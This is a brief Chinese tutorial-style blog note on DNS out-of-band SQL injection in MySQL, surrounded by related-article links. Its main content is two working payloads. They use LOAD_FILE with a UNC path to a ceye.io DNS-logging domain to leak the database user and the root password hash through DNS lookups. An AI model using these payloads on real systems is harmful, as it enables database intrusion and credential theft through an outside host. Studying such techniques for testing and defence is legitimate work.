小結--dns注入
0x01 雜言
最近實在是太忙了,考試都排滿了,晚上剛考完,補一下昨天的東西,寫一下dns注入。
咱們知道在盲注的時候,要用腳本去跑,在測試的時候效率就不是很高,這時候用dns注入每每事半功倍mysql
0x02 payload
這裏直接貼一下payloadsql
LOAD_FILE(CONCAT(0x5C5C,(HEX(USER())),0x2E3563733076642E636579652E696F5C313233))
下面這個是沒有引號的
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.[圖片]mysql.ip.port.xxxx.ceye.io\\abc'));
這裏上面的地址能夠用ceye.io這個網站去看dns的解析記錄測試
相關文章
- 1. SQL注入:DNS注入
- 2. SQL注入小結
- 3. sql注入小結
- 4. sql注入——dns的帶外注入
- 5. 封神臺MYSQL 注入 - Dns注入
- 6. SQL注入篇——dns回顯注入
- 7. DNS 學習小結
- 8. DNS知識小結
- 9. SqlMap post cookie注入小結
- 10. SQL報錯注入小結
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. SQL注入:DNS注入
- 2. SQL注入小結
- 3. sql注入小結
- 4. sql注入——dns的帶外注入
- 5. 封神臺MYSQL 注入 - Dns注入
- 6. SQL注入篇——dns回顯注入
- 7. DNS 學習小結
- 8. DNS知識小結
- 9. SqlMap post cookie注入小結
- 10. SQL報錯注入小結